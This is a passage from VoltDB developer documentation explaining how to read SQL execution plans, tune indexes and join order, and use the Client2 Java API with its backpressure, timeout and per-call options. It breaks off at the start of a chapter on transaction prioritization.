a very simple application.\nDeciding how to partition the database for your specific needs and how to configure a cluster to support the\nVoltDB features you want to use requires careful consideration of capabilities and tradeoffs. The following\nchapters provide further guidance on this topics.\n12Chapter 3. Understanding VoltDB\nExecuon Plans\nThis chapter explains how VoltDB plans for executing SQL statements, the information it generates about\nthe plans, and how you can use that information to evaluate and optimize your SQL code.\n3.1. How VoltDB Selects Execution Plans for Indi-\nvidual SQL Statements\nWhen VoltDB parses a stored procedure definition or an ad hoc query, it reviews possible execution plans\nfor the SQL statements involved. Based on the schema, the partition columns, and any implicit or explicit\nindexes for the tables, VoltDB chooses what it believes is the most efficient plan for executing each state-\nment. The more complex the SQL statement, the more execution plans VoltDB considers.\nAs part of the compilation process, VoltDB generates explain or execution plans that you can use to un-\nderstand what execution order was selected. You can also affect those plans by specifying the order in\nwhich tables are joined as part of your SQL statement declaration.\n3.2. Understanding VoltDB Execution Plans\nVoltDB stores the execution plans for stored procedures along with the schema in the database. There are\nthree methods for reviewing these execution plans. You can:\n•Call the @Explain or @ExplainProc system procedures\n•Use the explain or explainproc directives in sqlcmd\n•Review the execution plans in the VoltDB Management Center Schema tab\nThe system procedures and sqlcmd directives produce identical output. For example, if you enter the\nexplainproc directive in sqlcmd with the name of a stored procedure, it displays the execution plan for\nevery SQL statement defined in the stored procedure. You get the same results calling the @ExplainProc\nsystem procedure. You can see the same information by connecting to the VoltDB Management Center in\na web browser. The explain directive and @Explain system procedure allow you to review the execution\nplan for an ad hoc SQL query by entering the text of the query.\nLet's look at the voter sample program as an example. The voter sample has five stored procedures. The\nInitialize procedure declares three SQL statements. You can see the execution plans for all three state-\nments by starting the sample application, connecting to the server using sqlcmd and using the explainproc\ndirective. You can also get the execution plan for an ad hoc count of the votes table using the explain\ndirective, like so:\n$ sqlcmd\n1> explainproc Initialize;\n . . .\n2> explain select count(*) from votes;\n . . .\nIn the VoltDB Management Center, which is available from a web browser via http::// {server-name} :8080\nby default, you can see the execution plans by navigating to the Schema tab, clicking on Procedures &\n13Understanding Volt-\nDB Execution Plans\nSQL, and expanding the stored procedure to see the individual statements. The execution plan is displayed\nin the expanded view. The following example shows the execution plan for InsertContestantStmt in the\nInitialize stored procedure.\n3.3. Reading the Execution Plan and Optimizing\nYour SQL Statements\nThe execution plan is an ordered representation of how VoltDB will execute the statement. Read the plan\nfrom bottom up to understand the order in which the plan is executed. So, for example, looking at the\nInsertACSStmt SQL statement in the Voter application's Initialize stored procedure, we see the following\nexecution plan for inserting an area code into the area_code_state table:\nRETURN RESULTS TO STORED PROCEDURE\n LIMIT 1\n RECEIVE FROM ALL PARTITIONS\n SEND PARTITION RESULTS TO COORDINATOR\n INSERT into \"AREA_CODE_STATE\"\n MATERIALIZE TUPLE from parameters and/or literals\nAs mentioned before it is easiest to read the plans from the bottom up. So in this instance, how the SQL\nstatement is executed is by:\n•Constructing a record based on input parameters and/or literal values\n•Inserting the record into the table\n14Understanding Volt-\nDB Execution Plans\n•Because this is a multi-partitioned procedure, each partition then sends its results to the coordinator\n•The coordinator then rolls up the results, limits the results (that is, the status of the insert) to one row,\nand returns that value to the stored procedure\nYou will notice that the lines of the execution plan are indented to indicate precedence. For example, the\nconstruction of the tuple must happen before it is inserted into the table.\nLet's look at another example from the Voter sample. The checkContestantStmt in the Vote stored proce-\ndure performs a read operation:\nRETURN RESULTS TO STORED PROCEDURE\n INDEX SCAN of \"CONTESTANTS\" using its primary key index\n uniquely match (CONTESTANT_NUMBER = ?0)\nYou can see from the plan that the scan of the CONTESTANTS table uses the primary key index. It is\nalso a partitioned table and procedure so the results can be sent directly back to the stored procedure.\nOf course, planning for a SQL statement accessing one table with only one condition is not very difficult.\nThe execution plan becomes far more interesting when evaluating more complex statements. For example,\nyou can find a more complex execution plan in the GetStateHeatmap stored procedure:\nRETURN RESULTS TO STORED PROCEDURE\n ORDER BY (SORT)\n Hash AGGREGATION ops: SUM(V_VOTES_BY_CONTESTANT_NUMBER_STATE.NUM_VOTES)\n RECEIVE FROM ALL PARTITIONS\n SEND PARTITION RESULTS TO COORDINATOR\n SEQUENTIAL SCAN of \"V_VOTES_BY_CONTESTANT_NUMBER_STATE\"\nIn this example you see an execution plan for a multi-partition stored procedure. Again, reading from the\nbottom up, the order of execution is:\n•At each partition, perform a sequential scan of the votes-per-contestant-and-state table.\n•Return the results from each partition to the initiator that is coordinating the multi-partition transaction.\n•Use an aggregate function to sum the votes for all partitions by contestant.\n•Sort the results\n•And finally, return the results to the stored procedure.\n3.3.1. Evaluating the Use of Indexes\nWhat makes the execution plans important is that they can help you optimize your database application\nby pointing out where the data access can be improved, either by modifying indexes or by changing the\njoin order of queries. Let's start by looking at indexes.\nVoltDB uses information about the partitioning column to determine what partition needs to execute a sin-\ngle-partitioned stored procedure. However, it does not automatically create an index for accessing records\nin that column. So, for example, in the Hello World example, if we remove the primary key (DIALECT)\non the HELLOWORLD table, the execution plan for the Select statement also changes.\nBefore:\nRETURN RESULTS TO STORED PROCEDURE\n15Understanding Volt-\nDB Execution Plans\n INDEX SCAN of \"HELLOWORLD\" using its primary key index\n uniquely match (DIALECT = ?0)\nAfter:\nRETURN RESULTS TO STORED PROCEDURE\n SEQUENTIAL SCAN of \"HELLOWORLD\"\n filter by (DIALECT = ?0)\nNote that the first operation has changed to a sequential scan of the HELLOWORLD table, rather than a\nindexed scan. Since the Hello World example only has a few records, it does not take very long to look\nthrough five or six records looking for the right one. But imagine doing a sequential scan of an employee\ntable containing tens of thousands of records. It quickly becomes apparent how important having an index\ncan be when looking for individual records in large tables.\nThere is an incremental cost associated with inserts or updates to tables containing an index. But the\nimprovement on read performance often far exceeds any cost associated with writes. For example, consider\nthe flight application that is used as an example in the Using VoltDB manual. The FLIGHT table is a\nreplicated table with an index on the FLIGHT_ID, which helps for transactions that join the FLIGHT and\nRESERVATION tables looking for a specific flight.\nHowever, one of the most common transactions associated with the FLIGHT table is customers looking\nfor flights during a specific time period; not by flight ID. In fact, looking up flights by time period is\nestimated to occur at least twice as often as looking for a specific flight.\nThe execution plan for the LookupFlight stored procedure using the original schema looks like this:\nRETURN RESULTS TO STORED PROCEDURE\n SEQUENTIAL SCAN of \"FLIGHT\"\n filter by ((((ORIGIN = ?0) AND (DESTINATION = ?1)) \n AND (DEPARTTIME > ?2)) AND (DEPARTTIME < ?3))\nClearly, looking through a table of 2,000 flights without an index 10,000 times a second will impact\nperformance. So it makes sense to add another index to improve this transaction. For example:\nCREATE TABLE Flight (\n FlightID INTEGER UNIQUE NOT NULL,\n DepartTime TIMESTAMP NOT NULL,\n Origin VARCHAR(3) NOT NULL,\n Destination VARCHAR(3) NOT NULL,\n NumberOfSeats INTEGER NOT NULL,\n PRIMARY KEY(FlightID)\n);\nCREATE INDEX flightTimeIdx ON FLIGHT ( departtime);\nAfter adding the index, the execution plan changes to use the index:\nRETURN RESULTS TO STORED PROCEDURE\n INDEX SCAN of \"FLIGHT\" using \"FLIGHTTIMEIDX\"\n range-scan covering from (DEPARTTIME > ?2) while (DEPARTTIME < ?3), \n filter by ((ORIGIN = ?0) AND (DESTINATION = ?1))\nIndexes are not required for every database query. For very small tables or infrequent queries, an index\ncould be unnecessary overhead. However, in most cases and especially frequent queries over large datasets,\nnot having an applicable index can severely impact performance.\n16Understanding Volt-\nDB Execution Plans\nWhen tuning your VoltDB database application, one useful step is to review the schema for any unexpected\nsequential (non-indexed) scans. The VoltDB Management Center makes this easy because it puts the\n\"Scans\" icon in the attributes column for any stored procedures that contain sequential scans.\nSee the following chapter, Chapter 4, Using Indexes Effectively , for more information on tuning your\ndatabase through effective use of indexes.\n3.3.2. Evaluating the Table Order for Joins\nThe other information that the execution plans provides, in addition to the use of indexes, is the order in\nwhich the tables are joined.\nJoin order often impacts performance. Normally, when joining two or more tables, you want the database\nengine to scan the table that produces the smallest number of matching records first. That way, there are\nfewer comparisons to evaluate when considering the other conditions. However, at compile time, VoltDB\ndoes not have any information about the potential sizing of the individual tables and must make its best\nguess based solely on the table schema, query, and any indexes that are defined.\nFor example, assume we have a database that correlates employees to departments. There is a DEPART-\nMENT table and an EMPLOYEE table, with a DEPT_ID column that acts as a foreign key. But depart-\nments have managers, who are themselves employees. So there is a MANAGER table that also contains\nboth a DEPT_ID and an EMP_ID column. The relationship of the tables looks like this:\nMost transactions look up employees by their employee ID or their department ID. So indexes are created\nfor those columns. However, say we want to look up all the employees that report to a specific manager.\nNow we need to join the MANAGER table (to get the department ID), the DEPARTMENT table (to get\nthe department name), and the EMPLOYEE table (to get the employees' names). VoltDB does not know,\nin advance when compiling the schema, that there will be many more employees than departments or\nmanagers. As a result, the winning plan might look like the following:\nRETURN RESULTS TO STORED PROCEDURE\n ORDER BY (SORT)\n NESTLOOP INDEX JOIN\n inline (INDEX SCAN of \"DEPARTMENT\" using \"DEPTIDX\" (unique-scan covering))\n NESTLOOP INDEX JOIN\n inline (INDEX SCAN of \"MANAGER\" using \"MGRIDX\" (unique-scan covering))\n RECEIVE FROM ALL PARTITIONS\n17Understanding Volt-\nDB Execution Plans\n SEND PARTITION RESULTS TO COORDINATOR\n SEQUENTIAL SCAN of \"EMPLOYEE\"\nClearly, performing a sequential scan of the employees (since the department ID has not been identified\nyet) is not going to provide the best performance. What you really want to do is to join the MANAGER\nand DEPARTMENT tables first, to identify the department ID before joining the EMPLOYEE table so\nthe last join can take advantage of the appropriate index.\nFor cases where you are joining multiple tables and know what the optimal join order would be, VoltDB lets\nyou specify the join order as part of the SQL statement definition. Normally, you declare a new SQLstmt\nclass by specifying the SQL query only. However, you can provide a second argument specifying the join\norder as a comma-separated list of table names and aliases. For example, the declaration of the preceding\nSQL query, including join order, would look like this:\npublic final SQLStmt FindEmpByMgr = new SQLStmt(\n \"SELECT dept.dept_name, dept.dept_id, emp.emp_id, \" +\n \"emp.first_name, emp.last_name, manager.emp_id \" +\n \"FROM MANAGER, DEPARTMENT AS Dept, EMPLOYEE AS Emp \" + \n \"WHERE manager.emp_id=? AND manager.dept_id=dept.dept_id \" +\n \"AND manager.dept_id=emp.dept_id \" +\n \"ORDER BY emp.last_name, emp.first_name\",\n \"manager,dept,emp\" );\nNote that where the query defines an alias for a table — as the preceding example does for the DEPART-\nMENT and EMPLOYEE tables — the join order must use the alias name rather than the original table\nname. Also, if a query joins six or more tables, you must specify the join order or VoltDB reports an error\nwhen it compiles the project.\nHaving specified the join order, the chosen execution plan changes to reflect the new sequence of oper-\nations:\nRETURN RESULTS TO STORED PROCEDURE\n ORDER BY (SORT)\n RECEIVE FROM ALL PARTITIONS\n SEND PARTITION RESULTS TO COORDINATOR\n NESTLOOP INDEX JOIN\n inline (INDEX SCAN of \"EMPLOYEE\" using \"EMPDEPTIDX\" (unique-scan covering))\n NESTLOOP INDEX JOIN\n inline (INDEX SCAN of \"DEPARTMENT\" using \"DEPTIDX\" (unique-scan covering))\n SEQUENTIAL SCAN of \"MANAGER\"\nThe new execution plan has at least three advantages over the default plan:\n•It starts with a sequential scan of the MANAGER table, a table with 10-20 times fewer rows than the\nEMPLOYEE table.\n•Because MANAGER and DEPARTMENT are replicated tables, all of the initial table scanning and\nfiltering can occur locally within each partition, rather than returning the full EMPLOYEE data from\neach partition to the initiator to do the later joins and sorting.\n•Because the join order retrieves the department ID first, the execution plan can utilize the index on that\ncolumn to improve the scanning of EMPLOYEE, the largest table.\n18Chapter 4. Using Indexes Effecvely\nIndexes provide a classic “space for speed” trade-off. They add to the persistent memory required by your\napplication data but they make query filtering significantly faster. They also represent a trade-off that\nsacrifices incremental write performance for potentially significant read performance, on the assumption\nthat indexed data is accessed by read queries more frequently than it is modified.\nUsing the best practices described in the chapter when defining indexes can maximize query performance\nin return for minimum investments in memory usage and computation overhead when writing data.\n4.1. Basic Principles for Effective Indexing\nHere are seven tips to creating effective indexes in VoltDB:\n•Avoid indexes that have a column list that is simply a prefix of another index's column list. The index\nwith the longer column list will usually serve the same queries as the shorter one. If the primary key\nof table X is (A, B, C), then an index on (A, B) is of little use. An index on (B, C) may be of use in\nthis scenario or it may be more effective to define the primary key as (B, C, A) — if B is likely to be\nfiltered in queries where A is not equality-filtered.\n•Avoid \"low-cardinality\" indexes — An index defined solely on a column that only has a few distinct\nvalues is usually not very effective. Because of its large number of duplicate values, it does little to nar-\nrow the set of rows to be sequentially filtered by other filters in the query. Such an index can sometimes\ncause the planner to fail to select a more effective index for a query or even a more efficient sequential\nscan. One way to increase index effectiveness of low cardinality indexes is to add other filtered columns\nto the index, keeping in mind that the effectiveness of an index for a query \"tops out\" at the first column\nthat has an inequality filter — or before the second column that has an IN filter.\n•When deciding how to order columns within an index (or primary key or unique constraint) definition,\ncolumns that are more likely to be filtered with an exact equality (such as A = ?), should be listed before\ncolumns that tend to be range-filtered (B <= ?). Queries that are run the most often or that benefit the\nmost from indexing (perhaps because they lack filters that can be covered by other indexes) should\nweigh more heavily in this decision.\n•In some cases, with a roughly equal mix between queries using forms like \"WHERE A = ? AND B <= ?\"\nand other queries using forms like \"WHERE A > ? AND B = ?\", it may be worthwhile to define indexes\non both permutations — on X(A, B ...) and on X(B, A ...). Otherwise, when two or more columns in\nan index tend to both get equality filtered in combination, it is generally better to list a column first if\nit also tends to be filtered (without the other) in other queries. A possible exception to this rule is when\nthe column has low cardinality (to avoid the ineffective use of the index).\n•Placing the low-cardinality column later in the index's list prevents the index from being applied as a\nlow-cardinality indexed filter and favors the selection of a more effective index or sequential scan.\n•Any non-unique filter that is listed in the schema report as having no procedures using it is a candidate\nfor elimination. But first, it may make sense to look for queries that would be expected to use the index\nand determine what they are using instead for scans on the table. It may be that the index chosen by the\nplanner is not actually as effective and that index may be the better candidate for elimination. Also, note\nthat indexes that are only used to support recalculation of min and max values in materialized views\nmay be erroneously reported as unused.\n•Index optimization is best accomplished iteratively, eliminating or tuning an index on a table and seeing\nits effect on statements before making other changes to other competing indexes.\n19Using Indexes Effectively\n4.2. Defining Indexes\nVoltDB indexes provide multiple benefits. They help to guard against unintended duplication of data. They\nhelp to optimize recalculation of min and max values in materialized views. Tree indexes in particular can\nalso be used to replace memory- and processor-intensive sorting operations in queries that have ORDER\nBY and GROUP BY clauses. This discussion focuses on the benefits of indexes in implementing SQL\nWHERE clauses that filter query results.\nThere are several methods for constructing indexes in SQL:\n•PRIMARY KEY column attribute\n•UNIQUE or ASSUME UNIQUE column attribute\n•PRIMARY KEY table constraint\n•UNIQUE or ASSUME UNIQUE table constraint\n•CREATE INDEX statement\nAny of these methods can be used to define a “UNIQUE” index on a single column. The table constraints\nand CREATE INDEX statements can also define a “UNIQUE” index on multiple columns or on expres-\nsions that use one or more columns. The CREATE INDEX statement can be used to construct a non-\nUNIQUE index on one or more columns or expressions.\nAll examples in this chapter describe indexes as if they were created by the CREATE INDEX statement,\nbut the discussion applies generally to indexes defined using any of these methods.\n4.3. The Goals for Effective Indexing\nThe goals of effective indexing are to:\n•Eliminate unused indexes\n•Minimize redundancy (memory use and overhead for writes) among overlapping indexes on a table\n•Minimize sequential scans of large numbers of rows\nSequential filtering always occurs when rows are accessed without the benefit of an index. This is known\nas a sequential scan . Sequential filtering can also occur on an indexed scan when there are more filters in\nthe query than are covered by the index. The cost of sequential filtering is based on several factors. One\nfactor is the number of filters being applied to each row. A major factor is the number of rows to which\nthe filters must be applied.\nThe intent of an index is to use a more streamlined “lookup” algorithm to produce a small set of filtered\nrows, eliminating the need to sequentially apply (as many) filters to (as many) rows.\nSince there are trade-offs and limitations involved in defining indexes, indexes may not provide complete\ncoverage for all of the filters in a query. If any filters are not covered by an index, they must be sequentially\napplied. The cost of this action is typically reduced compared to a sequential scan of the data because the\nindex reduces the two major contributing factors: the number of remaining, uncovered filters to apply, and\nthe number of rows to which they must be applied.\nThe lookup algorithm used by an index is typically much more efficient than sequential application for\nthe same set of filters and rows, but it does not have zero cost. It also slightly complicates the process\n20Using Indexes Effectively\nof sequentially applying any remaining filters to the remaining rows. In fact, the worst-case scenario for\nquery filter performance is when an index's lookup algorithm is employed but fails to cover most of a\nquery's filters and fails to eliminate most of the table's rows. This case can perform significantly worse than\na sequential scan query that uses no index at all and applies all of its filters sequentially. This possibility\ncalls for the elimination of ineffective indexes from a database.\nAn ideal set of index definitions minimizes the number of times that any filter is sequentially applied to\nany row in any query over the life of the database system. It accomplishes this with a minimum number\nof indexes, each of minimum complexity, to reduce persistent memory and data write computation costs.\n4.4. How Indexes Work\nA key insight into defining indexes is determining which of the filters in a query can be “covered” by a\ngiven index. Filters and combinations of filters qualify for coverage based on different criteria.\nEach \"scan\" in a query, that is, each argument to a FROM clause that is not a subquery, can use up to one\nindex defined on its table. When a table defines multiple indexes on the same table, these indexes compete\nin the query planner for the mission of controlling each scan in each query that uses the table. The query\nplanner uses several criteria to evaluate which one of the table's indexes that cover one or more filters in\nthe query is the most likely to be the most efficient.\nWhen indexing a single column, as in \"CREATE INDEX INDEX_OF_X_A ON X(A);\", a covered filter\ncan be any of the following:\n•\"A <op> <constant>\", where <op> can be any of \"=, <, >, <=, or >=\"\n•\"A BETWEEN <constant1> AND <constant2>\"\n•\"A IN <constant-list>\"\n•A special case of \"A LIKE <string-pattern>\" where <string-pattern> contains a fixed prefix followed\nby a wild-card character\nHere, <constant> , <constant1> , and <constant2> can be actual literal constants like 1.0 or 'ABC' or they\ncan be placeholders (?) that resolve to constants at runtime. <constant-list> can be a list of literals or\nliterals and parameters like ('ABC', 'BAC', 'BCA', 'ACB', 'CBA', 'BAC') or (1, 2, 3, ?) or (?, ?, ?, ?, ?)\nor a single vector-valued placeholder. Each of these \"constants\" can also be an expression of constants,\nsuch as ((1024*1024)-1).\nDepending on the order in which tables are scanned in a query, called the join order , a covered filter can also\nbe \"A <op> <column>\" where <column> is a column from another table in the query or any expression of\na column or columns from another table and possibly constants, like B or (B || C) or SUBSTR( B||C , 1 , 4 ).\nThe join order dependency works like this: if you had two tables indexed on column A and your query is\nas follows, only one table could be indexed:\nSELECT * FROM X, Y WHERE X.A = Y.A and X.B = ?;\nThe first one to be scanned would have to use a sequential table scan. If you also had an index on X.B, X\ncould be index-scanned on B and Y could then be index-scanned on A, so a table scan would be avoided.\nThe availability of indexes that cover the scans of a query have a direct effect on the planners selection of\nthe join order for a query. In this case, the planner would reject the option of scanning Y first, since that\nwould mean one more sequential scan and one fewer index scan, and the planner prefers more index scans\nwhenever possible on the assumption that index scans are more efficient.\n21Using Indexes Effectively\nWhen creating an index containing multiple columns, as in \"CREATE INDEX INDEX_OF_X_A_B ON\nX(A, B);\", a covered filter can be any of the forms listed above for coverage by a simpler index “ON\nX(A)”, regardless of the presence of a filter on B — this is used to advantage when columns are added to\nan index to lower its cardinality, as discussed below.\nA multi-column index “ON X(A, B) can be used more effectively in queries with a combination of filters\nthat includes a filter on A and a filter on B. To enable the more effective filtering, the first filter or prefix\nfilter on A must specifically have the form of \"A = ...\" or \"A IN ...\" — possibly involving column(s) of\nother tables, depending on join order — while the filter on B can be any form from the longer list of\ncovered filters, above.\nA specific exception to this rule is that a filter of the form \"B IN ...\" does not improve the effectiveness of\na filter of the form \"A IN ...\", but that same filter \"B IN ...\" can be used with a filter of the specific form \"A\n= ...\". In short, each index is restricted to applying to only one “IN” filter per query. So, when the index\nis covering “A IN …”, it will refuse to cover the “B IN …” filter.\nThis extends to indexes on greater numbers of columns, so an index \"ON X(A, B, C)\" can generally be\nused for all of the filters and filter combinations described above using A or using A and B. It can be\nused still more effectively on a combination of prefix filters like \"A = ... \" ( or \"A IN ...\" ) AND \"B\n= ...\" ( or \"B IN ...\" ) with an additional filter on C — but again, only the first \"IN\" filter improves the\nindex effectiveness, and other “IN” filters are not covered.\nWhen determining whether a filter can be covered as the first or prefix filter of an index (first or second filter\nof an index on three or more columns, etc.), the ordering of the filters always follows the ordering of the\ncolumns in the index definition. So, “CREATE INDEX INDEX_ON_X_A_B ON X(A, B)” is significantly\ndifferent from “CREATE INDEX INDEX_ON_X_B_A ON X(B, A)”. In contrast, the orientation of the\nfilters as expressed in each query does not matter at all, so \"A = 1 and B > 10\" has the same effect on\nindexing as \"10 < B and A = 1\" etc. The filter “A = 1” is considered the “first” filter in both cases when\nthe index is “ON (A, B)” because A is first.\nAlso, other arbitrary filters can be combined in a query with “AND” without disqualifying the covered\nfilters; these additional filters simply add (reduced) sequential filtering cost to the index scan.\nBut a top-level OR condition like \"A = 0 OR A > 100\" will disqualify all filters and will not use any index.\nA general pre-condition of a query's filters eligible for coverage by a multi-column index is that the first\nkey in the index must be filtered. So, if a query had no filter at all on A, it could not use any of the above\nindexes, regardless of the filters on B and/or on C. This is the condition that can cause table scans if there\nare not enough indexes, or if the indexes or queries are not carefully matched.\nThis implies that carelessly adding columns to the start of an already useful index's list can make it less\nuseful and applicable to fewer queries. Conversely, adding columns to the end of an already useful index\n(rather than to the beginning) is more likely to make the index just as applicable but more effective in\neliminating sequential filtering. Adding to the middle of the list can cause an index to become either more\nor less effective for the queries to which it applies. Any such change should be tested by reviewing the\nschema report and/or by benchmarking the affected queries. Optimal index use and query performance\nmay be achieved either with the original definition of the index, with the changed definition, or by defining\ntwo indexes.\n4.5. Summary\nTo recap, here are the best practices for defining indexes in VoltDB:\n•Avoid indexes that have a column list that is simply a prefix of another index's column list. The index\nwith the longer column list will usually serve the same queries as the shorter one. If the primary key\n22Using Indexes Effectively\nof table X is (A, B, C), then an index on (A, B) is of little use. An index on (B, C) may be of use in\nthis scenario or it may be more effective to define the primary key as (B, C, A) — if B is likely to be\nfiltered in queries where A is not equality-filtered.\n•Avoid \"low-cardinality\" indexes — An index defined solely on a column that only has a few distinct\nvalues is usually not very effective. Because of its large number of duplicate values, it does little to nar-\nrow the set of rows to be sequentially filtered by other filters in the query. Such an index can sometimes\ncause the planner to fail to select a more effective index for a query or even a more efficient sequential\nscan. One way to increase index effectiveness of low cardinality indexes is to add other filtered columns\nto the index, keeping in mind that the effectiveness of an index for a query \"tops out\" at the first column\nthat has an inequality filter — or before the second column that has an IN filter.\n•When deciding how to order columns within an index (or primary key or unique constraint) definition,\ncolumns that are more likely to be filtered with an exact equality (such as A = ?), should be listed before\ncolumns that tend to be range-filtered (B <= ?). Queries that are run the most often or that benefit the\nmost from indexing (perhaps because they lack filters that can be covered by other indexes) should\nweigh more heavily in this decision.\n•In some cases, with a roughly equal mix between queries using forms like \"WHERE A = ? AND B <= ?\"\nand other queries using forms like \"WHERE A > ? AND B = ?\", it may be worthwhile to define indexes\non both permutations — on X(A, B ...) and on X(B, A ...). Otherwise, when two or more columns in\nan index tend to both get equality filtered in combination, it is generally better to list a column first if\nit also tends to be filtered (without the other) in other queries. A possible exception to this rule is when\nthe column has low cardinality (to avoid the ineffective use of the index).\n•Placing the low-cardinality column later in the index's list prevents the index from being applied as a\nlow-cardinality indexed filter and favors the selection of a more effective index or sequential scan.\n•Any non-unique filter that is listed in the schema report as having no procedures using it is a candidate\nfor elimination. But first, it may make sense to look for queries that would be expected to use the index\nand determine what they are using instead for scans on the table. It may be that the index chosen by the\nplanner is not actually as effective and that index may be the better candidate for elimination. Also, note\nthat indexes that are only used to support recalculation of min and max values in materialized views\nmay be erroneously reported as unused.\n•Index optimization is best accomplished iteratively, eliminating or tuning an index on a table and seeing\nits effect on statements before making other changes to other competing indexes.\n23Chapter 5. A Modern Java Client\nProgramming Interface (API) for VoltDB\nVoltDB V11 introduces a new client programming interface. The Client2 interface is similar to the original\nClient interface in that you create a configuration object, then create the client itself using the client factory.\nAfter connecting to the database, you can then make either synchronous or asynchronous procedure calls.\nHowever, that is where the similarity ends. Where Client provides a rudimentary interface using gener-\nic callbacks to handle both success and failure, Client2 uses modern Java programming techniques and\nsmarter defaults to provide a structured and extensible interface, including:\n•A \"builder\" pattern for the Client2Config, with individual methods that can be chained to set configu-\nration options.\n•No mandatory settings, all attributes have default values.\n•Smarter default behavior to simplify application development.\n•Individually configured notifications, set as callbacks on the configuration object, that let the application\ndecide which events it wants to be notified about and how.\n•Use of Java CompletableFutures to handle asynchronous procedure calls, giving the application devel-\noper more structured and precise handling of invocation events.\nThe following sections describe the individual steps for creating and application using the Client2 API.\nFor a complete listing of classes and methods, see the VoltDB Client API javadoc .\n5.1. Configuring the Client\nThe first step is to set the configuration options for your client, using Client2Config. You can take the\ndefault options by just creating a new Client2Config object:\nClient2Config config = new Client2Config(); \nClient2 client = ClientFactory.createClient(config);\nOr you can specify individual attributes by chaining the associated methods, when you create the config-\nuration object:\nClient2Config config = new Client2Config() .username(\"john\")\n .password(\"doe\"); \nClient2 client = ClientFactory.createClient(config);\nNote that you can set up custom error handling as part of the configuration by defining which events the\napplication wants to be notified about. For example:\nClient2Config config = new Client2Config().username(\"john\")\n .password(\"doe\")\n .connectionDownHandler(..myDropHandler..); \nClient2 client = ClientFactory.createClient(config);\nThe interfaces to the handlers are defined as functional interfaces in the class Client2Notification, allowing\nuse of method references or lambda expressions.\n24A Modern Java Client Program-\nming Interface (API) for VoltDB\n5.2. Connecting to the Database\nClient2 simplifies the process establishing and maintaining connections to the database. By default Client2\nautomates creating connections to all nodes of the cluster once a single connection is made, and reconnects\nas necessary as nodes leave and rejoin the cluster.\nSo, you can simply connect to one node of the cluster and the Client2 interface will take responsibility\nfor connecting to other cluster nodes:\nclient.connectSync(\"localhost\");\nOr you can supply a list of nodes and the client will create a connection to the first it can reach, then\nestablish connections to the rest of the cluster:\nString[] servers = [\"eeny\",\"meeny\",\"miny\"];\nclient.connectSync(servers);\n5.3. Calling Procedures\nOnce the application connects to the database you are ready to make procedure calls. At its simplest, you\ncan make a synchronous call that returns the traditional response object:\nClientResponse resp = client.callProcedureSync(\"AddUser\", username, password);\nHowever, asynchronous calls are where the new Client2 excels. Asynchronous calls return a Completable-\nFuture (a standard Java object) which can then be used to process the response. For example, you can\nassign different actions based on the results of the call:\nCompletableFuture<ClientResponse> addUserCB;\naddUserCB = client.callProcedure(\"AddUser\",username,password);\naddUserCB.whenComplete( (resp,th) -> processResponse( resp ) );\nAlternately, it is possible to hand off the response to a processing thread:\nclient.callProcedureAsync(\"AddUser\", username, password)\n .thenAcceptAsync((resp) -> processResponse(resp))\n .exceptionally((th) -> processException(th));\n5.3.1. Handling Backpressure\nThe Client2 interface improves the handling of backpressure; that is, when requests are submitted faster\nthan they can be processed. It is possible for an application to submit requests faster than the client API or\nthe VoltDB server can handle them, particularly when using asynchronous calls. To handle this situation,\nthe API tracks all pending requests: this includes requests queued in the API, requests in the network\nlayer, and requests sent to the VoltDB cluster but which have not been completed yet. The application can\nconfigure three limits on the number of requests pending in the client:\n•A high and low watermark, set using .clientRequestBackpressureWarning. If the number of outstand-\ning requests exceeds the high watermark, the application is notified to slow down. If the number of\noutstanding requests then falls below the low watermark, the application is notified that it can resume\nnormal operation.\n25A Modern Java Client Program-\nming Interface (API) for VoltDB\n•A maximum number of requests, set using .clientRequestLimit. Once the client reaches this limit, sub-\nsequent procedure invocations are rejected until the request count drops below the limit again.\nAdditionally, there is a configurable limit on the number of transactions that can be outstanding at the\nVoltDB cluster, set using .outstandingTransactionLimit. For example:\nconfig.clientRequestBackpressureWarning(2500, 1000)\n .clientRequestLimit(3000)\n .outstandingTransactionLimit(1000);\nThis example defines the following rules:\n•When the number of pending requests goes up to 2500, the application is told to slow down. This is\nthe high watermark.\n•When the number or requests falls to 1000 or below, the application is told it can resume normal oper-\nation. This is the low watermark.\n•If the number of pending requests exceeds 3000, callProcedure will refuse to accept any more requests.\n•If the number of outstanding requests submitted to the cluster without a response exceeds 1000, the\nclient automatically adds additional requests to the client queue.\nNotifications for the high and low watermarks are delivered to the application via a callback defined as\npart of the client configuration with the .requestBackpressureHandler() method:\nconfig.requestBackpressureHandler(myQueueWarning);\nIf you want to provide additional context to the event handler, you can define the callback as a local function\nwithin a class and use the \"this::\" syntax, so the callback has access to any context available to the class:\nconfig.requestBackpressureHandler(this::myBackpressureHandler);\nThe callback itself identifies the particular condition by way of a boolean argument it receives. For ex-\nample:\nvoid myQueueWarning (boolean watermark) { \n if(watermark) { // high watermark\n [ ... ]\n } else { // low watermark\n [ ... ]\n }\n}\nThe argument is true when the request count has risen above the high watermark and false when it subse-\nquently drops below the low watermark.\nThe client interface handles reaching the server limit internally. Once the server limit is reached, calls are\nqueued locally until the high watermark is reached. Therefore, in the preceding example, the application\ncan have a total of up to 2000 calls (3000 - 1000) pending transmission before the client refuses to queue\nany more.\n5.3.2. Handling Request Timeouts\nThere are configurable limits for how long a request can be queued before it \"times out\". Requests can time\nout at the client before being sent to the server or after being sent. The error responses generated for these\ncases each have distinct status codes, allowing the application to easily identify each failure condition.\n26A Modern Java Client Program-\nming Interface (API) for VoltDB\n5.3.3. Defining Options on a Per-Call Basis\nSome invocation attributes defined in the configuration by Client2Config can be overridden on a per-call\nbasis by means of an options object. You create a new option object with Client2CallOptions, then apply\nit to a procedure call as the first argument. For example, the following code sets a call-specific timeout\nof 1,234 microseconds and a priority of 3:\nClient2CallOptions opts = new Client2CallOptions()\n .clientTimeout(1234, TimeUnit.MICROSECONDS)\n .requestPriority(3);\naddUserCB = callProcedureAsync(opts, \"AddUser\", username, password);\nOptions that are not specified in Client2CallOptions are defined by the configuration settings (or their\ndefaults), so the interface is extensible without forcing application code changes.\n27Chapter 6. Priorizing Transacons\nBy default, VoltDB execution queues operate on a FIFO (first in, first out) basis. Which is sufficient for\nmany applications, given the high volume of throughput VoltDB can achieve.\nHowever, there are cases where you may want to prioritize certain business critical transactions over oth-\ners. The latest VoltDB Java client programming interface (Client2) allows you to specify a priority for\nindividual invocations of procedures to ensure that the transactions that are important to you are given the\nappropriate attention by the system. This chapter explains:\n•How prioritization works\n•How to enable prioritization\n•How to specify the priority for individual invocations\n•How to prioritize classes of transactions, such as import, topics, snapshots, and database replication (DR)\n6.1. How Prioritizing Transactions Works\nLet's look at the voter 